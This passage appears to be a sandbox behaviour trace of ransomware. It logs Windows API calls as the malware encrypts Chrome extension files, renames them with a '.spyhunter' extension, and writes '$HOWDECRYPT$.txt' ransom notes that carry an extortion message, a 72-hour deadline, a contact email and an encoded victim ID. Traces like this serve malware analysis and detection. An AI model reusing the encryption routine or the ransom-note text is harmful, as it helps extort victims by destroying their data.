hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebf8 | out: pbBuffer=0x248ebf8) returned 1 [0159.191] GetProcessHeap () returned 0x2c0000 [0159.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.191] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebf0*=0x30) returned 1 [0159.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json") returned 155 [0159.192] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.192] GetProcessHeap () returned 0x2c0000 [0159.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.192] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebb4*=0x138, lpOverlapped=0x0) returned 1 [0159.194] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffec8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.194] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x138, lpNumberOfBytesWritten=0x248ebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebb4*=0x138, lpOverlapped=0x0) returned 1 [0159.194] GetProcessHeap () returned 0x2c0000 [0159.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.194] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.194] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebb4, lpOverlapped=0x0 | out: lpBuffer=0x248ebf4*, lpNumberOfBytesWritten=0x248ebb4*=0x4, lpOverlapped=0x0) returned 1 [0159.194] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebb4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebb4*=0x30, lpOverlapped=0x0) returned 1 [0159.194] CloseHandle (hObject=0x9c) returned 1 [0159.194] GetProcessHeap () returned 0x2c0000 [0159.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.195] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.spyhunter") returned 165 [0159.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\messages.json.spyhunter")) returned 1 [0159.196] GetProcessHeap () returned 0x2c0000 [0159.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.196] GetProcessHeap () returned 0x2c0000 [0159.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.196] GetProcessHeap () returned 0x2c0000 [0159.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f824f8 | out: hHeap=0x2c0000) returned 1 [0159.197] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebf0 | out: pbBuffer=0x248ebf0) returned 1 [0159.197] GetProcessHeap () returned 0x2c0000 [0159.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.197] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebe8*=0x30) returned 1 [0159.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.198] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json") returned 143 [0159.198] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0159.198] GetProcessHeap () returned 0x2c0000 [0159.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.198] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ebac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ebac*=0x310, lpOverlapped=0x0) returned 1 [0159.308] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffcf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.308] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x248ebac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ebac*=0x310, lpOverlapped=0x0) returned 1 [0159.308] GetProcessHeap () returned 0x2c0000 [0159.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.308] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.308] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ebac, lpOverlapped=0x0 | out: lpBuffer=0x248ebec*, lpNumberOfBytesWritten=0x248ebac*=0x4, lpOverlapped=0x0) returned 1 [0159.309] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ebac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ebac*=0x30, lpOverlapped=0x0) returned 1 [0159.309] CloseHandle (hObject=0x9c) returned 1 [0159.309] GetProcessHeap () returned 0x2c0000 [0159.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.309] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.spyhunter") returned 153 [0159.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.spyhunter")) returned 1 [0159.310] GetProcessHeap () returned 0x2c0000 [0159.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.310] GetProcessHeap () returned 0x2c0000 [0159.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.311] GetProcessHeap () returned 0x2c0000 [0159.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3d40 | out: hHeap=0x2c0000) returned 1 [0159.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.312] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.312] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec4c, lpOverlapped=0x0 | out: lpBuffer=0x248eb23*, lpNumberOfBytesWritten=0x248ec4c*=0x127, lpOverlapped=0x0) returned 1 [0159.313] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.313] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec4c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.313] CloseHandle (hObject=0x9c) returned 1 [0159.314] GetProcessHeap () returned 0x2c0000 [0159.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0fca8 | out: hHeap=0x2c0000) returned 1 [0159.314] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebe8 | out: pbBuffer=0x248ebe8) returned 1 [0159.314] GetProcessHeap () returned 0x2c0000 [0159.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.314] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebe0*=0x30) returned 1 [0159.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.315] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json") returned 162 [0159.315] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.315] GetProcessHeap () returned 0x2c0000 [0159.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.315] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eba4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eba4*=0x253, lpOverlapped=0x0) returned 1 [0159.394] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffdad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.394] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x248eba4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eba4*=0x253, lpOverlapped=0x0) returned 1 [0159.394] GetProcessHeap () returned 0x2c0000 [0159.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.394] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.394] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebe4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eba4, lpOverlapped=0x0 | out: lpBuffer=0x248ebe4*, lpNumberOfBytesWritten=0x248eba4*=0x4, lpOverlapped=0x0) returned 1 [0159.395] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eba4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eba4*=0x30, lpOverlapped=0x0) returned 1 [0159.395] CloseHandle (hObject=0x9c) returned 1 [0159.395] GetProcessHeap () returned 0x2c0000 [0159.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.395] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.spyhunter") returned 172 [0159.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\messages.json.spyhunter")) returned 1 [0159.397] GetProcessHeap () returned 0x2c0000 [0159.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.398] GetProcessHeap () returned 0x2c0000 [0159.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.398] GetProcessHeap () returned 0x2c0000 [0159.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07798 | out: hHeap=0x2c0000) returned 1 [0159.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.399] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.399] WriteFile (in: hFile=0x9c, lpBuffer=0x248eb1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ec44, lpOverlapped=0x0 | out: lpBuffer=0x248eb1b*, lpNumberOfBytesWritten=0x248ec44*=0x127, lpOverlapped=0x0) returned 1 [0159.400] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.400] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ec44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ec44*=0x2ac, lpOverlapped=0x0) returned 1 [0159.400] CloseHandle (hObject=0x9c) returned 1 [0159.400] GetProcessHeap () returned 0x2c0000 [0159.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06fa0 | out: hHeap=0x2c0000) returned 1 [0159.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ebe0 | out: pbBuffer=0x248ebe0) returned 1 [0159.400] GetProcessHeap () returned 0x2c0000 [0159.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0159.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ebd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ebd8*=0x30) returned 1 [0159.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0159.401] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.401] GetProcessHeap () returned 0x2c0000 [0159.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.402] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eb9c*=0x289, lpOverlapped=0x0) returned 1 [0159.479] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffd77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.480] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x248eb9c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eb9c*=0x289, lpOverlapped=0x0) returned 1 [0159.480] GetProcessHeap () returned 0x2c0000 [0159.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.480] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.480] WriteFile (in: hFile=0x9c, lpBuffer=0x248ebdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eb9c, lpOverlapped=0x0 | out: lpBuffer=0x248ebdc*, lpNumberOfBytesWritten=0x248eb9c*=0x4, lpOverlapped=0x0) returned 1 [0159.480] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eb9c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248eb9c*=0x30, lpOverlapped=0x0) returned 1 [0159.480] CloseHandle (hObject=0x9c) returned 1 [0159.480] GetProcessHeap () returned 0x2c0000 [0159.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.481] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.spyhunter") returned 169 [0159.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.spyhunter")) returned 1 [0159.482] GetProcessHeap () returned 0x2c0000 [0159.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.482] GetProcessHeap () returned 0x2c0000 [0159.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0159.482] GetProcessHeap () returned 0x2c0000 [0159.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81bc8 | out: hHeap=0x2c0000) returned 1 [0159.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0159.483] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to 